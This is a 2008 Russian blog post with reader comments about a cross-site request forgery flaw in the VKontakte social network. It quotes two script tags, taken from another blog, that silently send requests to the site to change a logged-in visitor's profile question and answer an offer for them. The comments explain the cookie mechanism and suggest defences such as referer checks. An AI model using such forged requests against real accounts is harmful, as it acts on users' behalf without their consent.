Небольшая уязвимость Вконтакте
Июнь 19, 2008Вредоносный код расположен на этой странице одного блога и представляет собой небольшой яваскрипт:
<script src=”http://vkontakte.ru/matches.php?act=a_save&question=peredat+privet+Vadimu+Bilalovu”></script><br />
<script src=”http://vkontakte.ru/matches.php?act=a_sent&to_id=24573&dec=1″></script>
Как видете этот код изменяет предложение, если оно включено у пользователя, на “Хотите ли вы peredat privet Vadimu Bilalovu?” и отвечает “да” на предложение этого человека.
хм, а что такого – ведь если вы залогинились фконтакте (да и не только там…), а потом не выходя с него перешли на какой-нить другой сайт, один хрен кукисы контакта ещё есь у вас и он будет делать что вы попросите.
Посему стоит юзать с осторожностью всякие опции типа “запомнить меня” и входить каждый раз самому. Так же хорошая мысль не держать одновременно кучу вкладок с разных сайтов.
угу. я просто на этот блог напоролся =)
В любом случае можно же на серваке проверять реферер и усё. страничка с настройками контакта если не ошибаюсь имеет такую проверку.